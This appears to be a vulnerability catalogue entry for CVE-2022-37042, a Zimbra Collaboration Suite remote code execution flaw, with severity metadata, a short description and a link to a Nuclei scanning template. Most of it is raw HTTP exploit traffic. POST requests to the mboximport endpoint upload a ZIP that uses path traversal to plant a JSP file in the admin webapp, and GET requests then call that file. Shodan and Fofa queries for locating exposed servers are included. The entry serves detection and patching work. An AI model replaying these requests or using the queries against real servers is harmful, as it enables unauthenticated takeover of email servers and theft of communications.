| Title | Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution |
|---|---|
| Author | _0xf4n9x_,For3stCo1d |
| Severity | Critical |
| Impact | Unauthenticated attackers can bypass authentication and upload arbitrary files through the mboximport functionality, achieving directory traversal and remote code execution on Zimbra Collaboration Suite servers, potentially compromising email systems and sensitive communications. |
| Remediation | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94333 |
| CVE ID | CVE-2022-37042 |
| CWE ID | CWE-22 |
| Shodan Query | http.favicon.hash:"1624375939"http.favicon.hash:"475145467" |
| Fofa Query | app="zimbra-邮件系统"icon_hash="475145467"icon_hash="1624375939" |
| Tags | cve cve2022 zimbra rce unauth kev vkev vuln |
Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.
GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.5
Accept-Encoding: gzip
Connection: close
GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept-Encoding: gzip
Connection: close
POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 716
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Connection: close
PK = ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0 �OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX ��PK?�]� � PK = ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0 �OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX ��PK?�]� � PK ?�]� � = ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK ?�]� � = � ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK � �
POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Content-Length: 716
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Connection: close
PK = ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0 �OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX ��PK?�]� � PK = ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0 �OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX ��PK?�]� � PK ?�]� � = ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK ?�]� � = � ../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK � �
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-37042.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-37042.pcap
N/AN/A